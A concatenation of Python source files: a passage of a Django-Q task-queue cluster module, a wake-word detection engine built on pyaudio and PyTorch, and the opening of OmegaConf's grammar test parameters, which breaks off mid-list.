self.status() == Conf.STOPPING and count < self.timeout * 10: sleep(0.1) Stat(self).save() count += 1 # Final status Stat(self).save() def pusher(task_queue: Queue, event: Event, broker: Broker = None): """ Pulls tasks of the broker and puts them in the task queue :type broker: :type task_queue: multiprocessing.Queue :type event: multiprocessing.Event """ if not broker: broker = get_broker() logger.info(_(f"{current_process().name} pushing tasks at {current_process().pid}")) while True: try: task_set = broker.dequeue() except Exception as e: logger.error(e, traceback.format_exc()) # broker probably crashed. Let the sentinel handle it. sleep(10) break if task_set: for task in task_set: ack_id = task[0] # unpack the task try: task = SignedPackage.loads(task[1]) except (TypeError, BadSignature) as e: logger.error(e, traceback.format_exc()) broker.fail(ack_id) continue task["ack_id"] = ack_id task_queue.put(task) logger.debug(_(f"queueing from {broker.list_key}")) if event.is_set(): break logger.info(_(f"{current_process().name} stopped pushing tasks")) def monitor(result_queue: Queue, broker: Broker = None): """ Gets finished tasks from the result queue and saves them to Django :type broker: brokers.Broker :type result_queue: multiprocessing.Queue """ if not broker: broker = get_broker() name = current_process().name logger.info(_(f"{name} monitoring at {current_process().pid}")) for task in iter(result_queue.get, "STOP"): # save the result if task.get("cached", False): save_cached(task, broker) else: save_task(task, broker) # acknowledge result ack_id = task.pop("ack_id", False) if ack_id and (task["success"] or task.get("ack_failure", False)): broker.acknowledge(ack_id) # signal execution done post_execute.send(sender="django_q", task=task) # log the result if task["success"]: # log success logger.info(_(f"Processed [{task['name']}]")) else: # log failure logger.error(_(f"Failed [{task['name']}] - {task['result']}")) logger.info(_(f"{name} stopped monitoring 
results")) def worker( task_queue: Queue, result_queue: Queue, timer: Value, timeout: int = Conf.TIMEOUT ): """ Takes a task from the task queue, tries to execute it and puts the result back in the result queue :param timeout: number of seconds wait for a worker to finish. :type task_queue: multiprocessing.Queue :type result_queue: multiprocessing.Queue :type timer: multiprocessing.Value """ name = current_process().name logger.info(_(f"{name} ready for work at {current_process().pid}")) task_count = 0 if timeout is None: timeout = -1 # Start reading the task queue for task in iter(task_queue.get, "STOP"): result = None timer.value = -1 # Idle task_count += 1 # Get the function from the task logger.info(_(f'{name} processing [{task["name"]}]')) f = task["func"] # if it's not an instance try to get it from the string if not callable(task["func"]): f = pydoc.locate(f) close_old_django_connections() timer_value = task.pop("timeout", timeout) # signal execution pre_execute.send(sender="django_q", func=f, task=task) # execute the payload timer.value = timer_value # Busy try: res = f(*task["args"], **task["kwargs"]) result = (res, True) except Exception as e: result = (f"{e} : {traceback.format_exc()}", False) if error_reporter: error_reporter.report() if task.get("sync", False): raise with timer.get_lock(): # Process result task["result"] = result[0] task["success"] = result[1] task["stopped"] = timezone.now() result_queue.put(task) timer.value = -1 # Idle # Recycle if task_count == Conf.RECYCLE or rss_check(): timer.value = -2 # Recycled break logger.info(_(f"{name} stopped doing work")) def save_task(task, broker: Broker): """ Saves the task package to Django or the cache :param task: the task package :type broker: brokers.Broker """ # SAVE LIMIT < 0 : Don't save success if not task.get("save", Conf.SAVE_LIMIT >= 0) and task["success"]: return # enqueues next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=task["group"], 
cached=task["cached"], sync=task["sync"], broker=broker, ) # SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning close_old_django_connections() try: database_to_use = {"using": Conf.SCHEDULER_BD} if Conf.SCHEDULER_BD else {} with db.transaction.atomic(**database_to_use): last = Success.objects.select_for_update().last() if task["success"] and 0 < Conf.SAVE_LIMIT <= Success.objects.count(): last.delete() # check if this task has previous results if Task.objects.filter(id=task["id"], name=task["name"]).exists(): existing_task = Task.objects.get(id=task["id"], name=task["name"]) # only update the result if it hasn't succeeded yet if not existing_task.success: existing_task.stopped = task["stopped"] existing_task.result = task["result"] existing_task.success = task["success"] existing_task.attempt_count = existing_task.attempt_count + 1 existing_task.save() if ( Conf.MAX_ATTEMPTS > 0 and existing_task.attempt_count >= Conf.MAX_ATTEMPTS ): broker.acknowledge(task["ack_id"]) else: func = task["func"] # convert func to string if inspect.isfunction(func): func = f"{func.__module__}.{func.__name__}" elif inspect.ismethod(func): func = ( f"{func.__self__.__module__}." 
f"{func.__self__.__name__}.{func.__name__}" ) Task.objects.create( id=task["id"], name=task["name"], func=func, hook=task.get("hook"), args=task["args"], kwargs=task["kwargs"], started=task["started"], stopped=task["stopped"], result=task["result"], group=task.get("group"), success=task["success"], attempt_count=1, ) except Exception as e: logger.error(e) def save_cached(task, broker: Broker): task_key = f'{broker.list_key}:{task["id"]}' timeout = task["cached"] if timeout is True: timeout = None try: group = task.get("group", None) iter_count = task.get("iter_count", 0) # if it's a group append to the group list if group: group_key = f"{broker.list_key}:{group}:keys" group_list = broker.cache.get(group_key) or [] # if it's an iter group, check if we are ready if iter_count and len(group_list) == iter_count - 1: group_args = f"{broker.list_key}:{group}:args" # collate the results into a Task result results = [ SignedPackage.loads(broker.cache.get(k))["result"] for k in group_list ] results.append(task["result"]) task["result"] = results task["id"] = group task["args"] = SignedPackage.loads(broker.cache.get(group_args)) task.pop("iter_count", None) task.pop("group", None) if task.get("iter_cached", None): task["cached"] = task.pop("iter_cached", None) save_cached(task, broker=broker) else: save_task(task, broker) broker.cache.delete_many(group_list) broker.cache.delete_many([group_key, group_args]) return # save the group list group_list.append(task_key) broker.cache.set(group_key, group_list, timeout) # async_task next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=group, cached=task["cached"], sync=task["sync"], broker=broker, ) # save the task broker.cache.set(task_key, SignedPackage.dumps(task), timeout) except Exception as e: logger.error(e) def scheduler(broker: Broker = None): """ Creates a task from a schedule at the scheduled time and schedules next run """ if not broker: broker = get_broker() 
close_old_django_connections() try: database_to_use = {"using": Conf.SCHEDULER_BD} if Conf.SCHEDULER_BD else {} with db.transaction.atomic(**database_to_use): for s in ( Schedule.objects.select_for_update() .exclude(repeats=0) .filter(next_run__lt=timezone.now()) .filter( db.models.Q(cluster__isnull=True) | db.models.Q(cluster=Conf.PREFIX) ) ): args = () kwargs = {} # get args, kwargs and hook if s.kwargs: try: # eval should be safe here because dict() kwargs = eval(f"dict({s.kwargs})") except SyntaxError: kwargs = {} if s.args: args = ast.literal_eval(s.args) # single value won't eval to tuple, so: if type(args) != tuple: args = (args,) q_options = kwargs.get("q_options", {}) if s.hook: q_options["hook"] = s.hook # set up the next run time if s.schedule_type != s.ONCE: next_run = arrow.get(s.next_run) while True: if s.schedule_type == s.MINUTES: next_run = next_run.shift(minutes=+(s.minutes or 1)) elif s.schedule_type == s.HOURLY: next_run = next_run.shift(hours=+1) elif s.schedule_type == s.DAILY: next_run = next_run.shift(days=+1) elif s.schedule_type == s.WEEKLY: next_run = next_run.shift(weeks=+1) elif s.schedule_type == s.MONTHLY: next_run = next_run.shift(months=+1) elif s.schedule_type == s.QUARTERLY: next_run = next_run.shift(months=+3) elif s.schedule_type == s.YEARLY: next_run = next_run.shift(years=+1) elif s.schedule_type == s.CRON: if not croniter: raise ImportError( _( "Please install croniter to enable cron expressions" ) ) next_run = arrow.get( croniter(s.cron, localtime()).get_next() ) if Conf.CATCH_UP or next_run > arrow.utcnow(): break # arrow always returns a tz aware datetime, and we don't want # this when we explicitly configured django with USE_TZ=False s.next_run = ( next_run.datetime if settings.USE_TZ else next_run.datetime.replace(tzinfo=None) ) s.repeats += -1 # send it to the cluster scheduled_broker = broker try: scheduled_broker = get_broker(q_options["broker_name"]) except: # invalid broker_name or non existing broker with 
broker_name pass q_options["broker"] = scheduled_broker q_options["group"] = q_options.get("group", s.name or s.id) kwargs["q_options"] = q_options s.task = django_q.tasks.async_task(s.func, *args, **kwargs) # log it if not s.task: logger.error( _( f"{current_process().name} failed to create a task from schedule [{s.name or s.id}]" ) ) else: logger.info( _( f"{current_process().name} created a task from schedule [{s.name or s.id}]" ) ) # default behavior is to delete a ONCE schedule if s.schedule_type == s.ONCE: if s.repeats < 0: s.delete() continue # but not if it has a positive repeats s.repeats = 0 # save the schedule s.save() except Exception as e: logger.error(e) def close_old_django_connections(): """ Close django connections unless running with sync=True. """ if Conf.SYNC: logger.warning( "Preserving django database connections because sync=True. Beware " "that tasks are now injected in the calling context/transactions " "which may result in unexpected bahaviour." ) else: db.close_old_connections() def set_cpu_affinity(n: int, process_ids: list, actual: bool = not Conf.TESTING): """ Sets the cpu affinity for the supplied processes. Requires the optional psutil module. :param int n: affinity :param list process_ids: a list of pids :param bool actual: Test workaround for Travis not supporting cpu affinity """ # check if we have the psutil module if not psutil: logger.warning("Skipping cpu affinity because psutil was not found.") return # check if the platform supports cpu_affinity if actual and not hasattr(psutil.Process(process_ids[0]), "cpu_affinity"): logger.warning( "Faking cpu affinity because it is not supported on this platform" ) actual = False # get the available processors cpu_list = list(range(psutil.cpu_count())) # affinities of 0 or gte cpu_count, equals to no affinity if not n or n >= len(cpu_list): return # spread the workers over the available processors. 
index = 0 for pid in process_ids: affinity = [] for k in range(n): if index == len(cpu_list): index = 0 affinity.append(cpu_list[index]) index += 1 if psutil.pid_exists(pid): p = psutil.Process(pid) if actual: p.cpu_affinity(affinity) logger.info(_(f"{pid} will use cpu {affinity}")) def rss_check(): if Conf.MAX_RSS: if resource: return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss >= Conf.MAX_RSS elif psutil: return psutil.Process().memory_info().rss >= Conf.MAX_RSS * 1024 return False def localtime() -> datetime: """Override for timezone.localtime to deal with naive times and local times""" if settings.USE_TZ: return timezone.localtime() return datetime.now()
engine.py
"""the interface to interact with wakeword model""" import pyaudio import threading import time import argparse import wave import torchaudio import torch import numpy as np from neuralnet.dataset import get_featurizer from threading import Event class Listener: def __init__(self, sample_rate=8000, record_seconds=2): self.chunk = 1024 self.sample_rate = sample_rate self.record_seconds = record_seconds self.p = pyaudio.PyAudio() self.stream = self.p.open(format=pyaudio.paInt16, channels=1, rate=self.sample_rate, input=True, output=True, frames_per_buffer=self.chunk) def listen(self, queue): while True: data = self.stream.read(self.chunk , exception_on_overflow=False) queue.append(data) time.sleep(0.01) def run(self, queue): thread = threading.Thread(target=self.listen, args=(queue,), daemon=True) thread.start() print("\nWake Word Engine is now listening... \n") class WakeWordEngine: def __init__(self, model_file): self.listener = Listener(sample_rate=8000, record_seconds=2) self.model = torch.jit.load(model_file) self.model.eval().to('cpu') #run on cpu self.featurizer = get_featurizer(sample_rate=8000) self.audio_q = list() def save(self, waveforms, fname="wakeword_temp"): wf = wave.open(fname, "wb") # set the channels wf.setnchannels(1) # set the sample format wf.setsampwidth(self.listener.p.get_sample_size(pyaudio.paInt16)) # set the sample rate wf.setframerate(8000) # write the frames as bytes wf.writeframes(b"".join(waveforms)) # close the file wf.close() return fname def predict(self, audio): with torch.no_grad(): fname = self.save(audio) waveform, _ = torchaudio.load(fname, normalization=False) # don't normalize on train mfcc = self.featurizer(waveform).transpose(1, 2).transpose(0, 1) # TODO: read from buffer instead of saving and loading file # waveform = torch.Tensor([np.frombuffer(a, dtype=np.int16) for a in audio]).flatten() # mfcc = self.featurizer(waveform).transpose(0, 1).unsqueeze(1) out = self.model(mfcc) pred = torch.round(torch.sigmoid(out)) return 
pred.item() def inference_loop(self, action): while True: if len(self.audio_q) > 15: # remove part of stream diff = len(self.audio_q) - 15 for _ in range(diff): self.audio_q.pop(0) action(self.predict(self.audio_q)) elif len(self.audio_q) == 15: action(self.predict(self.audio_q)) time.sleep(0.05) def run(self, action): self.listener.run(self.audio_q) thread = threading.Thread(target=self.inference_loop, args=(action,), daemon=True) thread.start() class DemoAction: """This demo action will just randomly say Arnold Schwarzenegger quotes args: sensitivty. the lower the number the more sensitive the wakeword is to activation. """ def __init__(self, sensitivity=10): # import stuff here to prevent engine.py from # importing unecessary modules during production usage import os import subprocess import random from os.path import join, realpath self.random = random self.subprocess = subprocess self.detect_in_row = 0 self.sensitivity = sensitivity folder = realpath(join(realpath(__file__), '..', '..', '..', 'fun', 'arnold_audio')) self.arnold_mp3 = [ os.path.join(folder, x) for x in os.listdir(folder) if ".wav" in x ] def __call__(self, prediction): if prediction == 1: self.detect_in_row += 1 if self.detect_in_row == self.sensitivity: self.play() self.detect_in_row = 0 else: self.detect_in_row = 0 def play(self): filename = self.random.choice(self.arnold_mp3) try: print("playing", filename) self.subprocess.check_output(['play', '-v', '.1', filename]) except Exception as e: print(str(e)) if __name__ == "__main__": parser = argparse.ArgumentParser(description="demoing the wakeword engine") parser.add_argument('--model_file', type=str, default=None, required=True, help='optimized file to load. 
use optimize_graph.py') parser.add_argument('--sensitivty', type=int, default=10, required=False, help='lower value is more sensitive to activations') args = parser.parse_args() wakeword_engine = WakeWordEngine(args.model_file) action = DemoAction(sensitivity=10) print("""\n*** Make sure you have sox installed on your system for the demo to work!!! If you don't want to use sox, change the play function in the DemoAction class in engine.py module to something that works with your system.\n """) # action = lambda x: print(x) wakeword_engine.run(action) threading.Event().wait()
test_grammar.py
import math import re import threading import time from typing import Any, Callable, List, Optional, Set, Tuple import antlr4 from pytest import mark, param, raises, warns from omegaconf import ( AnyNode, Container, DictConfig, ListConfig, OmegaConf, _utils, grammar_parser, grammar_visitor, ) from omegaconf._utils import nullcontext from omegaconf.errors import ( GrammarParseError, InterpolationKeyError, InterpolationResolutionError, UnsupportedInterpolationType, ) TAB = "\t" # to be used in raw strings, e.g. `fr"C:\{TAB}foo"` # Characters that are not allowed by the grammar in config key names. INVALID_CHARS_IN_KEY_NAMES = r"""\{}()[].:"' """ UNQUOTED_SPECIAL = r"/-\+.$%*@?|" # special characters allowed in unquoted strings # A fixed config that may be used (but not modified!) by tests. BASE_TEST_CFG = OmegaConf.create( { # Standard data types. "str": "hi", "int": 123, "float": 1.2, "bytes": b"binary", "dict": {"a": 0, "b": {"c": 1}}, "list": [x - 1 for x in range(11)], "null": None, # Special cases. "x@y": 123, # @ in name "$x$y$z$": 456, # $ in name (beginning, middle and end) "0": 0, # integer name "FalsE": {"TruE": True}, # bool name "None": {"null": 1}, # null-like name "1": {"2": 12}, # dot-path with int keys # Used in nested interpolations. "str_test": "test", "ref_str": "str", "options": {"a": "A", "b": "B"}, "choice": "a", "rel_opt": ".options", } ) # Parameters for tests of the "singleElement" rule when there is no interpolation. # Each item is a tuple with three elements: # - The id of the test. # - The expression to be evaluated. # - The expected result, that may be an exception. If it is a `GrammarParseError` then # it is assumed that the parsing will fail. If it is another kind of exception then # it is assumed that the parsing will succeed, but this exception will be raised when # visiting (= evaluating) the parse tree. 
If the expected behavior is for the parsing # to succeed, but a `GrammarParseError` to be raised when visiting it, then set the # expected result to the pair `(None, GrammarParseError)`. PARAMS_SINGLE_ELEMENT_NO_INTERPOLATION: List[Tuple[str, str, Any]] = [ # Special keywords. ("null", "null", None), ("true", "TrUe", True), ("false", "falsE", False), ("true_false", "true_false", "true_false"), # Integers. ("int", "123", 123), ("int_pos", "+123", 123), ("int_neg", "-123", -123), ("int_underscore", "1_000", 1000), ("int_bad_underscore_1", "1_000_", "1_000_"), ("int_bad_underscore_2", "1__000", "1__000"), ("int_bad_underscore_3", "_1000", "_1000"), ("int_bad_zero_start", "007", "007"), # Floats. ("float", "1.1", 1.1), ("float_no_int", ".1", 0.1), ("float_no_decimal", "1.", 1.0), ("float_minus", "-.2", -0.2), ("float_underscore", "1.1_1", 1.11), ("float_bad_1", "1.+2", "1.+2"), ("float_bad_2", r"1\.2", r"1\.2"), ("float_bad_3", "1.2_", "1.2_"), ("float_exp_1", "-1e2", -100.0), ("float_exp_2", "+1E-2", 0.01), ("float_exp_3", "1_0e1_0", 10e10), ("float_exp_4", "1.07e+2", 107.0), ("float_exp_5", "1e+03", 1000.0), ("float_exp_bad_1", "e-2", "e-2"), ("float_exp_bad_2", "01e2", "01e2"), ("float_inf", "inf", math.inf), ("float_plus_inf", "+inf", math.inf), ("float_minus_inf", "-inf", -math.inf), ("float_nan", "nan", math.nan), ("float_plus_nan", "+nan", math.nan), ("float_minus_nan", "-nan", math.nan), # Unquoted strings. # Note: raw strings do not allow trailing \, adding a space and stripping it. 
( "str_legal", (r" a" + UNQUOTED_SPECIAL + r"\\ ").strip(), (r" a" + UNQUOTED_SPECIAL + r"\ ").strip(), ), ("str_illegal_1", "a,=b", GrammarParseError), ("str_illegal_2", f"{chr(200)}", GrammarParseError), ("str_illegal_3", f"{chr(129299)}", GrammarParseError), ("str_dot", ".", "."), ("str_dollar", "$", "$"), ("str_colon", ":", ":"), ("str_ws_1", "hello world", "hello world"), ("str_ws_2", "a b\tc \t\t d", "a b\tc \t\t d"), ("str_esc_ws_1", r"\ hello\ world\ ", " hello world "), ("str_esc_ws_2", rf"\ \{TAB}\{TAB}", f" {TAB}{TAB}"), ("str_esc_comma", r"hello\, world", "hello, world"), ("str_esc_colon", r"a\:b", "a:b"), ("str_esc_equal", r"a\=b", "a=b"), ("str_esc_parentheses", r"\(foo\)", "(foo)"), ("str_esc_brackets", r"\[foo\]", "[foo]"), ("str_esc_braces", r"\{foo\}", "{foo}"), ("str_esc_backslash", r" \ ".strip(), r" \ ".strip()), ("str_backslash_noesc", r"ab\cd", r"ab\cd"), ("str_esc_illegal_1", r"\#", GrammarParseError), ("str_esc_illegal_2", r""" \'\" """.strip(), GrammarParseError), # Quoted strings. 
("str_quoted_single", "'!@#$%^&*|()[]:.,\"'", '!@#$%^&*|()[]:.,"'), ("str_quoted_double", '"!@#$%^&*|()[]:.,\'"', "!@#$%^&*|()[]:.,'"), ("str_quoted_outer_ws_single", "' a \t'", " a \t"), ("str_quoted_outer_ws_double", '" a \t"', " a \t"), ("str_quoted_int", "'123'", "123"), ("str_quoted_null", "'null'", "null"), ("str_quoted_bool", "['truE', \"FalSe\"]", ["truE", "FalSe"]), ("str_quoted_list", "'[a,b, c]'", "[a,b, c]"), ("str_quoted_dict", '"{a:b, c: d}"', "{a:b, c: d}"), ("str_quoted_backslash_noesc_single", r"'a\b'", r"a\b"), ("str_quoted_backslash_noesc_double", r'"a\b"', r"a\b"), ("str_quoted_concat_bad_2", "'Hi''there'", GrammarParseError), ("str_quoted_too_many_1", "''a'", GrammarParseError), ("str_quoted_too_many_2", "'a''", GrammarParseError), ("str_quoted_too_many_3", "''a''", GrammarParseError), ("str_quoted_trailing_esc_1", r"'abc\\'", r" abc\ ".strip()), ("str_quoted_trailing_esc_2", r"'abc\\\\'", r" abc\\ ".strip()), ("str_quoted_no_esc_single_1", r"'abc\def'", r"abc\def"), ("str_quoted_no_esc_single_2", r"'abc\\def'", r"abc\\def"), ("str_quoted_no_esc_single_3", r"'\\\abc\def'", r"\\\abc\def"), ("str_quoted_no_esc_dollar_single", r"'abc\\$$'", r"abc\\$$"), ("str_quoted_no_esc_double_1", r'"abc\def"', r"abc\def"), ("str_quoted_no_esc_double_2", r'"abc\\def"', r"abc\\def"), ("str_quoted_no_esc_double_3", r'"\\\abc\def"', r"\\\abc\def"), ("str_quoted_no_esc_dollar_double", r'"abc\\$$"', r"abc\\$$"), ("str_quoted_bad_1", r'"abc\"', GrammarParseError), ("str_quoted_bad_2", r'"abc\\\"', GrammarParseError), ("str_quoted_esc_quote_single_1", r"'abc\'def'", "abc'def"), ("str_quoted_esc_quote_single_2", r"'abc\\\'def'", r"abc\'def"), ("str_quoted_esc_quote_single_3", r"'abc\\\\\'def'", r"abc\\'def"), ("str_quoted_esc_quote_single_4", r"'a\'b\'cdef\\\''", r"a'b'cdef\'"), ("str_quoted_esc_quote_single_bad", r"'abc\\'def'", GrammarParseError), ("str_quoted_esc_quote_double_1", r'"abc\"def"', 'abc"def'), ("str_quoted_esc_quote_double_2", r'"abc\\\"def"', 
r"abc\"def"), ("str_quoted_esc_quote_double_3", r'"abc\\\\\"def"', r'abc\\"def'), ("str_quoted_esc_quote_double_4", r'"a\"b\"cdef\\\""', r'a"b"cdef\"'), ("str_quoted_esc_quote_double_bad", r'"abc\\"def"', GrammarParseError), ("str_quoted_empty", "''", ""), ("str_quoted_basic", "'a'", "a"), ("str_quoted_tmp_1", r"'\a'", r"\a"), ("str_quoted_tmp_2", r"'a\'", GrammarParseError), ("str_quoted_inside_quote_different", "'\"'", '"'), ("str_quoted_inside_quote_same", r"'\''", "'"), ("str_quoted_extra_quote", r"'c:\\''", GrammarParseError), # Lists and dictionaries. ("list", "[0, 1]", [0, 1]), ( "dict", "{x: 1, a: b, y: 1e2, null2: 0.1, true3: false, inf4: true}", {"x": 1, "a": "b", "y": 100.0, "null2": 0.1, "true3": False, "inf4": True}, ), ( "dict_unquoted_key", rf"{{a0-null-1-3.14-NaN- {TAB}-true-False-{UNQUOTED_SPECIAL}\(\)\[\]\{{\}}\:\=\ \{TAB}\,:0}}", { rf"a0-null-1-3.14-NaN- {TAB}-true-False-{UNQUOTED_SPECIAL}()[]{{}}:= {TAB},": 0 }, ), ( "dict_quoted", "{0: 1, 'a': 'b', 1.1: 1e2, null: 0.1, true: false, -inf: true}", GrammarParseError, ), ( "structured_mixed", "[10,str,3.14,true,false,inf,[1,2,3], 'quoted', \"quoted\", 'a,b,c']", [ 10, "str", 3.14, True, False, math.inf, [1, 2, 3], "quoted", "quoted", "a,b,c", ], ), ("dict_int_key", "{0: 0}", {0: 0}), ("dict_float_key", "{1.1: 0}", {1.1: 0}), ("dict_null_key", "{null: 0}", {None: 0}), ("dict_nan_like_key", "{'nan': 0}", GrammarParseError), ("dict_list_as_key", "{[0]: 1}", GrammarParseError), ( "dict_bool_key", "{true: true, false: 'false'}", {True: True, False: "false"}, ), ("empty_dict", "{}", {}), ("empty_list", "[]", []), ( "structured_deep", "{null0: [0, 3.14, false], true1: {a: [0, 1, 2], b: {}}}", {"null0": [0, 3.14, False], "true1": {"a": [0, 1, 2], "b": {}}}, ), ] # Parameters for tests of the "singleElement" rule when there are interpolations. PARAMS_SINGLE_ELEMENT_WITH_INTERPOLATION = [ # Node interpolations. 
("dict_access", "${dict.a}", 0), ("list_access", "${list.0}", -1), ("dict_access_getitem", "${dict[a]}", 0), ("list_access_getitem", "${list[0]}", -1), ("getitem_first_1", "${[dict].a}", 0), ("getitem_first_2", "${[list][0]}", -1), ("dict_access_deep_1", "${dict.b.c}", 1), ("dict_access_deep_2", "${dict[b].c}", 1), ("dict_access_deep_3", "${dict.b[c]}", 1), ("dict_access_deep_4", "${dict[b][c]}", 1), ("list_access_underscore", "${list.1_0}", 9), ("list_access_bad_negative", "${list.-1}", InterpolationKeyError), ("dict_access_list_like_1", "${0}", 0), ("dict_access_list_like_2", "${1.2}", 12), ("bool_like_keys", "${FalsE.TruE}", True), ("null_like_key_ok", "${None.null}", 1), ("null_like_key_bad_case", "${NoNe.null}", InterpolationKeyError), ("null_like_key_quoted_1", "${'None'.'null'}", GrammarParseError), ("null_like_key_quoted_2", "${'None.null'}", GrammarParseError), ("dotpath_bad_type", "${dict.${float}}", (None, InterpolationResolutionError)), ("at_in_key", "${x@y}", 123), ("dollar_in_key", "${$x$y$z$}", 456), # Interpolations in dictionaries. ("dict_interpolation_value", "{hi: ${str}, int: ${int}}", {"hi": "hi", "int": 123}), ("dict_interpolation_key", "{${str}: 0, ${null}: 1", GrammarParseError), # Interpolations in lists. ("list_interpolation", "[${str}, ${int}]", ["hi", 123]), # Interpolations in unquoted strings. ("str_dollar_and_inter", "$$${str}", "$$hi"), ("str_inter", "hi_${str}", "hi_hi"), ("str_esc_illegal_3", r"\${foo\}", GrammarParseError), # Interpolations in quoted strings. 
("str_quoted_inter", "'${null}'", "None"), ("str_quoted_esc_single_1", r"'ab\'cd\'\'${str}'", "ab'cd''hi"), ("str_quoted_esc_single_2", r"""'\\\${foo}'""", r"\${foo}"), ("str_quoted_esc_single_3", r"""'\\a_${str}'""", r"\\a_hi"), ("str_quoted_esc_single_4", r"""'a_${str}\\'""", r" a_hi\ ".strip()), ("str_quoted_esc_double_1", r'"ab\"cd\"\"${str}"', 'ab"cd""hi'), ("str_quoted_esc_double_2", r'''"\\\${foo}"''', r"\${foo}"), ("str_quoted_esc_double_3", r'''"\\a_${str}"''', r"\\a_hi"), ("str_quoted_esc_double_4", r'''"a_${str}\\"''', r" a_hi\ ".strip()), ("str_quoted_other_quote_double", """'double"'""", 'double"'), ("str_quoted_other_quote_single", '''"single'"''', "single'"), ("str_quoted_concat_bad_1", '"Hi "${str}', GrammarParseError), ("str_quoted_nested", "'${test:\"b\"}'", "b"), ("str_quoted_nested_esc_quotes", "'${test:'b'}'", "b"), ("str_quoted_esc_inter", r"""'\${test:"b"}'""", '${test:"b"}'), ("str_quoted_esc_inter_and_quotes", r"'\${test:\'b\'}'", "${test:'b'}"), ("str_quoted_esc_inter_nested_single_1", r"""'${test:'\${str}'}'""", "${str}"), ("str_quoted_esc_inter_nested_single_2", r"""'${test:'\\${str}'}'""", r"\hi"), ("str_quoted_esc_inter_nested_single_3", r"""'${test:'\\\${str}'}'""", r"\${str}"), ("str_quoted_esc_inter_nested_double_1", r'''"${test:"\${str}"}"''', "${str}"), ("str_quoted_esc_inter_nested_double_2", r'''"${test:"\\${str}"}"''', r"\hi"), ("str_quoted_esc_inter_nested_double_3", r'''"${test:"\\\${str}"}"''', r"\${str}"), ("str_quoted_error_inside_quotes", "'${missing_brace'", GrammarParseError), # Whitespaces. 
("ws_inter_node_outer", "${ \tdict.a \t}", 0), ("ws_inter_node_around_dot", "${dict .\ta}", GrammarParseError), ("ws_inter_node_inside_id", "${d i c t.a}", GrammarParseError), ("ws_inter_res_outer", "${\t test:foo\t }", "foo"), ("ws_inter_res_around_colon", "${test\t : \tfoo}", "foo"), ("ws_inter_res_inside_id", "${te st:foo}", GrammarParseError), ("ws_inter_res_inside_args", "${test:f o o}", "f o o"), ("ws_inter_res_namespace", "${ns1 .\t ns2 . test:0}", GrammarParseError), ("ws_inter_res_no_args", "${test: \t}", []), ("ws_list", "${test:[\t a, b, ''\t ]}", ["a", "b", ""]), ("ws_dict", "${test:{\t a : 1\t , b: \t''}}", {"a": 1, "b": ""}), ("ws_quoted_single", "${test: \t'foo'\t }", "foo"), ("ws_quoted_double", '${test: \t"foo"\t }', "foo"), # Nested interpolations. ("nested_simple", "${${ref_str}}", "hi"), ("nested_select", "${options.${choice}}", "A"), ("nested_select_getitem", "${options[${choice}]}", "A"), ("nested_relative", "${${rel_opt}.b}", "B"), ("str_quoted_nested_deep_single", r"'AB${test:'CD${test:'EF'}GH'}'", "ABCDEFGH"), ("str_quoted_nested_deep_double", r'"AB${test:"CD${test:"EF"}GH"}"', "ABCDEFGH"), ("str_quoted_nested_deep_mixed", r'''"AB${test:'CD${test:"EF"}GH'}"''', "ABCDEFGH"), ( "str_quoted_issue_615", r'${test:"The root drive is: \\${str}:\\"}', r" The root drive is: \hi:\ ".strip(), ), # Resolver interpolations. ("no_args", "${test:}", []), ("space_in_args", "${test:a, b c}", ["a", "b c"]), ("list_as_input", "${test:[a, b], 0, [1.1]}", [["a", "b"], 0, [1.1]]), ("dict_as_input", "${test:{a: 1.1, b: b}}", {"a": 1.1, "b": "b"}), ("dict_as_input_quotes", "${test:{'a': 1.1, b: b}}", GrammarParseError), ("dict_typo_colons", "${test:{a: 1.1, b:: b}}", {"a": 1.1, "b": ": b"}), ("missing_resolver", "${MiSsInG_ReSoLvEr:0}", UnsupportedInterpolationType), ("at_in_resolver", "${y@z:}", GrammarParseError), ("ns_resolver", "${ns1.ns2.test:123}", 123), # Nested resolvers. 
("nested_resolver", "${${str_test}:a, b, c}", ["a", "b", "c"]), ("nested_deep", "${test:${${test:${ref_str}}}}", "hi"), ( "nested_resolver_combined_illegal", "${some_${resolver}:a, b, c}", GrammarParseError, ), ("nested_args", "${test:${str}, ${null}, ${int}}", ["hi", None, 123]), # Invalid resolver names. ("int_resolver_quoted", "${'0':1,2,3}", GrammarParseError), ("int_resolver_noquote", "${0:1,2,3}", GrammarParseError), ("float_resolver_quoted", "${'1.1':1,2,3}", GrammarParseError), ("float_resolver_noquote", "${1.1:1,2,3}", GrammarParseError), ("float_resolver_exp", "${1e1:1,2,3}", GrammarParseError), ("inter_float_resolver", "${${float}:1,2,3}", (None, InterpolationResolutionError)), # NaN as dictionary key (a resolver is used here to output only the key). ("dict_nan_key_1", "${first:{nan: 0}}", math.nan), ("dict_nan_key_2", "${first:{${test:nan}: 0}}", GrammarParseError), ] # Parameters for tests of the "configValue" rule (may contain interpolations). PARAMS_CONFIG_VALUE = [ # String interpolations (top-level). 
("str_top_basic", "bonjour ${str}", "bonjour hi"), ("str_top_quotes_single_1", "'bonjour ${str}'", "'bonjour hi'"), ( "str_top_quotes_single_2", "'Bonjour ${str}', I said.", "'Bonjour hi', I said.", ), ("str_top_quotes_double_1", '"bonjour ${str}"', '"bonjour hi"'), ( "str_top_quotes_double_2", '"Bonjour ${str}", I said.', '"Bonjour hi", I said.', ), ("str_top_missing_end_quote_single", "'${str}", "'hi"), ("str_top_missing_end_quote_double", '"${str}', '"hi'), ("str_top_missing_start_quote_double", '${str}"', 'hi"'), ("str_top_missing_start_quote_single", "${str}'", "hi'"), ("str_top_middle_quote_single", "I'd like ${str}", "I'd like hi"), ("str_top_middle_quote_double", 'I"d like ${str}', 'I"d like hi'), ("str_top_middle_quotes_single", "I like '${str}'", "I like 'hi'"), ("str_top_middle_quotes_double", 'I like "${str}"', 'I like "hi"'), ( "str_top_any_char", r"${str} " + UNQUOTED_SPECIAL + r"^!#&})][({,;", r"hi " + UNQUOTED_SPECIAL + r"^!#&})][({,;", ), ("str_top_esc_inter", r"Esc: \${str}", "Esc: ${str}"), ("str_top_esc_inter_wrong_1", r"Wrong: $\{str\}", r"Wrong: $\{str\}"), ("str_top_esc_inter_wrong_2", r"Wrong: \${str\}", r"Wrong: ${str\}"), ("str_top_esc_backslash_1", r"Esc: \\${str}", r"Esc: \hi"), ("str_top_esc_backslash_2", r"Esc: \\\\${str}", r"Esc: \\hi"), ("str_top_quoted_braces_wrong", r"Wrong: 